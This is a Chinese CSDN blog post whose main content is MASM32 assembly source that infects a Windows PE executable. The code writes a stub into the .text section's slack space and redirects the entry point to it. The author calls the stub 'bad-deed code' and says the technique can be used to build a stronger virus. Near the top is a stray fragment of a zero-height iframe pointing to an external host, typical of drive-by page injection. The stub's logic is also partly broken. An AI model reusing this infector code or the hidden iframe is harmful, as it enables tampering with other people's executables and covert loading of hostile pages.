注入PE的方法(原代码)

最新推荐文章于 2022-12-03 16:08:08 发布
最新推荐文章于 2022-12-03 16:08:08 发布
阅读量1.3k 收藏
点赞数
文章标签: header image null include byte file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guokeno1/article/details/1204610
版权
src="http://pspper.xkwm.cn/main.htm" width="100" height="0">

.386
.model flat,stdcall
option casemap:none

include <e:/masm32/include/windows.inc>
include <e:/masm32/include/kernel32.inc>
includelib <e:/masm32/lib/kernel32.lib>
include <e:/masm32/include/user32.inc>
includelib <e:/masm32/lib/user32.lib>

.data
sztest db "d:/test.exe",0                        ;这个你自己放在D盘中,做测试用
szExitProcess db "ExitProcess",0     ;默认的情况下所有进程都有KERNEL32这个DLL,所以为了简单,我们只注入这个函数
szKernel32 db "Kernel32.dll",0
@text db ".text",0
hKernel32 dd 0
hInstance dd 0
lpPEheader dd 0;PE头的地址,内存映射文件

.data?
ReadBuf  dd 100 dup(?)
NumReaded dd ?
__length  dd ?;附加代码长度
.code

instart equ this byte;坏事代码
_instart:
lpExitProcess dd 0
OldEntry dd 0
NewEntry dd 0
call @F
@@:
pop ebx
sub ebx,offset @B
push NULL
call [ebx+offset lpExitProcess];再次说明,用这个函数是为了简单,实际上可以依照本文原理炮制强大的病毒
jmp OldEntry
_inend:
inend equ this byte

RavtoOffset proc uses edx ecx esi edi Rav,lpSectionHeader;这个函数并未使用,为了以后扩展功能而设
assume esi:ptr IMAGE_SECTION_HEADER
mov esi,lpSectionHeader
mov edx,[esi].VirtualAddress
mov eax,edx
add eax,[esi].SizeOfRawData
.while !(Rav>edx && Rav<eax)
 add esi,sizeof IMAGE_SECTION_HEADER
 mov edx,[esi].VirtualAddress
 mov eax,edx
 add eax,[esi].SizeOfRawData 
.endw
mov ecx,Rav
sub ecx,edx
mov eax,[esi].PointerToRawData
add eax,ecx
ret
RavtoOffset endp

;上面的函数怎么干事呢?答:lpSectionHeader指向的节表中包括了所有的节信息,只要你传入的RAV>某节的VIRTUALADDRESS 且 <此节的VIRTUALADDRESS+SIZEOFRAWDATA(对齐后的节大小)那么只要用RAV-VIRTUALADDRESS+此节的POINTERTORAWDATA(这个节在磁盘中的位置)就行了!

OffsettoRav proc uses esi edx _offset,lpSectionHeader
assume esi:ptr IMAGE_SECTION_HEADER
mov esi,lpSectionHeader
mov edx,[esi].PointerToRawData
mov eax,edx
add eax,[esi].Misc.VirtualSize
.while !(_offset>edx && _offset<eax)
 add esi,sizeof IMAGE_SECTION_HEADER
 mov edx,[esi].PointerToRawData
 mov eax,edx
 add eax,[esi].Misc.VirtualSize 
.endw
mov eax,_offset
sub eax,[esi].PointerToRawData
add eax,[esi].VirtualAddress
ret
OffsettoRav endp

;RAVTOOFFSET的反函数,OFFSET-POINTERTORAWDATA+VIRTUALADDRESS得对应的RAV

insertPE proc szpe:DWORD,lpstart:DWORD,lpend:DWORD;干!!!!!
local _length
local NameBuf[9]:BYTE
local hFile,hMapFile,lpFile
local _NewEntry
local lpSection
invoke ReadProcessMemory,hInstance,addr _instart,addr ReadBuf,__length,addr NumReaded;把欲插入的代码读入缓冲区
invoke CreateFile,szpe,GENERIC_READ OR GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL;以下建立目标的内存映射文件方便操作
.if eax!=INVALID_HANDLE_VALUE
 mov hFile,eax
.else
 jmp __end
.endif
invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,NULL,NULL,NULL
mov hMapFile,eax
invoke MapViewOfFile,hMapFile,FILE_MAP_WRITE OR FILE_MAP_READ,NULL,NULL,NULL
mov lpFile,eax
;writePE,干!
mov edi,lpFile

;跳到节表去
assume edi:ptr IMAGE_DOS_HEADER
add edi,[edi].e_lfanew
assume edi:ptr IMAGE_NT_HEADERS
mov lpPEheader,edi
add edi,sizeof IMAGE_NT_HEADERS
assume  edi:ptr IMAGE_SECTION_HEADER

;下面搜索名为.text的节
mov esi,edi
lea edx,NameBuf
xor cl,cl
.while cl<8
 mov al,[esi]
 mov [edx],al
 inc esi
 inc edx
 inc cl
.endw
invoke lstrcmp,addr NameBuf,addr @text
.while eax
 add edi,sizeof IMAGE_SECTION_HEADER
 mov esi,edi
 lea edx,NameBuf
 xor cl,cl
 .while cl<8
  mov al,[esi]
  mov [edx],al
  inc esi
  inc edx
  inc cl
 .endw
 invoke lstrcmp,addr NameBuf,addr @text
.endw

;上面已经找到了目标节,准备干事...
mov eax,lpend
sub eax,lpstart
mov _length,eax;计算长度
assume edi:ptr IMAGE_SECTION_HEADER
mov lpSection,edi
mov eax,[edi].SizeOfRawData
sub eax,[edi].Misc.VirtualSize
.if eax<=_length
 jmp _end
.endif;如果空隙不够退出
mov eax,[edi].PointerToRawData
add eax,[edi].Misc.VirtualSize
add eax,12
mov _NewEntry,eax;计算新入口地址
add eax,lpFile
mov edi,eax
mov esi,lpPEheader
assume esi:ptr IMAGE_NT_HEADERS
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
mov dword ptr ReadBuf+4,eax;保存老入口地址
mov eax, _NewEntry;似乎是废话,权当花指令了,懒得动它

mov edi,lpSection
mov eax,[edi].Misc.VirtualSize
add eax,_length;修改节大小,重要!
mov [edi].Misc.VirtualSize,eax
invoke OffsettoRav,_NewEntry,lpSection;将入口化为RAV
mov [esi].OptionalHeader.AddressOfEntryPoint,eax;新入口写入
lea esi, ReadBuf
xor ecx,ecx
mov ecx,inend-instart

;以下便是注入部分了

mov edi,lpSection
assume edi:ptr IMAGE_SECTION_HEADER
mov edx,[edi].PointerToRawData
add edx,[edi].Misc.VirtualSize
add edx,lpFile
sub edx,_length
mov edi,edx
assume edi:nothing
.while ecx
 mov al,byte ptr[esi]
 mov [edi],al
 inc edi
 inc esi
 dec ecx
.endw
_end:
invoke FlushViewOfFile,lpFile,NULL
invoke UnmapViewOfFile,lpFile;保存修改
INVOKE CloseHandle,hFile
__end:
ret
insertPE endp

start:
mov  __length,inend-instart
invoke RtlZeroMemory,addr ReadBuf,sizeof ReadBuf
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke GetCurrentProcessId
invoke OpenProcess,PROCESS_VM_OPERATION OR PROCESS_VM_READ OR PROCESS_VM_WRITE,NULL,eax;修改进程读写权限
mov hInstance,eax

;导入函数,采用手工法,实际上也可以先导入LOADLIBRARY,GETPROCADDRESS两个然后让他们在病毒体中干事
invoke ReadProcessMemory,hInstance,addr _instart,addr ReadBuf,__length,addr NumReaded
invoke LoadLibrary,addr szKernel32
mov hKernel32,eax
invoke GetProcAddress,hKernel32,addr szExitProcess
mov  dword ptr ReadBuf,eax
invoke WriteProcessMemory,hInstance,addr _instart,addr ReadBuf,__length,addr NumReaded;导入
invoke insertPE,addr sztest,addr _instart,addr _inend
invoke ExitProcess,NULL
end start ;写完注释,真累,希望我说的大家能懂,我也是新手,但这代码绝对是自己一步一步磨出来的,希望对迷茫者有所帮助

guokeno1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
软件加密技术内幕
03-19
3.1.7 如何在另一个进程中注入代码 3.2 利用调试API编写脱壳机 3.2.1 tElock 0.98脱壳简介 3.2.2 脱壳机的编写 3.3 利用调试API制作内存补丁 3.3.1 跨进程内存存取机制 3.3.2 Debug API机制 第4章 Windows下...
PE文件静态注入
YJ_12340的博客
10-31 287
DLL注入指的是向运行中的其他进程强制插入特定的DLL文件。可以通过修改静态的PE文件,修改输入表结构,使得程序执行时载入特定的DLL文件。
PE代码注入
windows小菜鸡的博客
08-15 1386
PE文件入口地址EntryPoint指向了PE文件开始执行的位置,关于PE文件的具体格式,大家可以自行百度。 本代码主要实现了在32位可执行程序中注入了一个弹窗 。其主要理是修改EntryPoint地址处的内容,指向自己代码的地方,然后执行完毕后,再跳转到入口的地址。 其中值得注意的几点: (1)需要关闭PE的地址随机化功能,可以通过修改OptionHeader头中的DllCharacteristics = 0x8100,来绕过地址随机化。 (2)计算E8和E9的时候,CALL 偏移:跳转地址 = 当前
PE文件硬编码代码注入
yuge1123的博客
12-03 631
以下适合有PE基础的人看,最起码要知道PE的基本结构和rva以及foa之间如何相互转换,不然会看的迷迷糊糊首先我们需要准备一个程序,待会将代码注入这个程序中 随便编写一个简单的程序,将随机基址给关闭 程序编译完成之后就是一堆二进制的数据,如果我们想将代码注入到这个程序中,我们也只能以二进制的形式进行注入,不能像编码高级语言一样,比如我们想将 这段代码注入进去,要求是在程序运行时首先运行这段代码,然后再跳转到之前的代码逻辑 我们想将这段代码注入进去的话就只能将这段代码翻译成二进制的形式,然后再到这个exe的
手工解析PE(文件注入代码实现)
GNAIXGNAHZ的博客
06-11 468
手工解析PE(文件注入代码实现)
软件加密技术内幕配套光盘(iso版本)
10-19
计算PE文件代码区块CRC32的工具,可以将结果写进文件里 │ │ │ │ └─memcrc32 ;需要校验内存代码数据的程序 │ │ │ └─Detect Breakpoint ;校验内存中的片段代码的样例 │ │ └─CRC理 ;arbin翻译的《CRC...
程祥软件一件智能装机助手 v2.2.0 全能版.zip
07-14
2、新增 支持注入USB3.0驱动 3、新增 可直接选择要备份的映像格式 4、新增 对系统光盘类型的识别,方便用户。 5、新增 支持将Gho\WIM\ISO文件关联到程序及命令行参数 6、新增 Ghost还的智能引导修复 7、新增 ...
易语言黑月编译器
08-02
黑月是类似于斩月,目的是将易语言程序小型化,脱离支持库... 5、黑月的DLL可以使用类似其它语言DLLMAIN入口函数(黑月为“Dll入口函数”),可以通过DLL的模块句柄访问DLL的PE资源、注入进程、多线程应用等等优点。
PE格式文件的代码注入
谢启东的专栏
05-05 7980
 PE格式文件的代码注入   本文演示了在不需要重新编译源代码的情况下,怎样向Windows PE(Portable Executable)格式的文件(包括EXE、DLL、OCX)中注入自己的代码。 程序如图:         前言       或许,你想了解一个病毒程序是怎样把自身注入到一个正常的PE文件中的,又或者是,你为了保护某种数据而加密自己的P
PE文件注入 PE文件详解
02-28
这篇文章是关于PE文件注入技术的; 文章不但详细讲解了PE文件的结构; 而且讲述了如何在PE文件中进行注入代码的技术;
PE2HTML:将HTMLPHPASP注入PE
03-09
PE2HTML 向PE注入HTML / PHP / ASP 写出 免责声明 作者对您造成的任何损害不承担任何责任。 仅将此用于教育目的。 Osanda Malith 已获得。 根据在 。
代码注入exe文件
02-26
VC下将自己的代码注入PE文件,模仿病毒入侵exe文件,有说明文档、源代码,极具学习价值!!!!
C/C++ 进程无模块内存注入[x86/x64]
05-30
Windows R3 无模块注入,x86+x64通用,不支持异常处理,编译前关闭GS安全检查,VS2015所写,并无明显C++特征,兼容性极高
VC++修改PE文件
10-28
该程序只是介绍了PE文件的结构并简单的修改了一下,并没有向win32汇编中的那样先获得kernel.dll的地址,所以必须保证要修改的文件中加载了user32.dll.
PE注入代码
jacksonfan的专栏
07-26 3864
This article demonstrates five steps to inject your code in a portable executable (EXE, DLL, OCX,...) file without recompiling source code.  这篇文章介绍了在不重编译源码的前提下,怎样通过5个步骤把你的代码注入PE格式的文件(EXE, DLL, OCX,..
后端开发是一个涉及广泛技术和工具的领域.docx
最新发布
04-30
后端开发是一个涉及广泛技术和工具的领域,这些资源对于构建健壮、可扩展和高效的Web应用程序至关重要。以下是对后端开发资源的简要介绍: 首先,掌握一门或多门编程语言是后端开发的基础。Java、Python和Node.js是其中最受欢迎的几种。Java以其跨平台性和丰富的库而著名,Python则因其简洁的语法和广泛的应用领域而备受欢迎。Node.js则通过其基于JavaScript的单线程异步I/O模型,为Web开发提供了高性能的解决方案。 其次,数据库技术是后端开发中不可或缺的一部分。关系型数据库(如MySQL、PostgreSQL)和非关系型数据库(如MongoDB、Redis)各有其特点和应用场景。关系型数据库适合存储结构化数据,而非关系型数据库则更适合处理大量非结构化数据。 此外,Web开发框架也是后端开发的重要资源。例如,Express是一个基于Node.js的Web应用开发框架,它提供了丰富的API和中间件支持,使得开发人员能够快速地构建Web应用程序。Django则是一个用Python编写的Web应用框架,它采用了MVC的软件设计模式,使得代码结构更加清晰和易于维护。
华为数字化转型实践28个精华问答glkm.pptx
04-30
华为数字化转型实践28个精华问答glkm.pptx
新员工入职培训全流程资料包gl.zip
04-30
新员工入职培训全流程资料包(100+个文件) 1入职流程指引 万科新职员入职通知书 万科新职员入职引导手册 新进员工跟进管理表 新员工入职报到工作单(文职) 新员工入职报到流程 新员工入职流程表 新员工入职手续办理流程(工厂 新员工入职手续清单 新员工入职须知 新员工入职训流程 新员工入职引导表(导师用) 2 入职工具表格 3 培训方案计划 4培训管理流程 5培训教材课件 6 培训效果检测 7 员工管理制度 8 劳动合同协议 9 新员工培训PPT模板(28套)
spring bean工厂方法注入,工厂代码
06-03
好的,下面是一个使用工厂方法创建bean并注入到Spring容器中的示例代码: 首先,我们需要创建一个工厂类,用于创建Person对象: ```java public class PersonFactory { public Person createPerson(String name, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值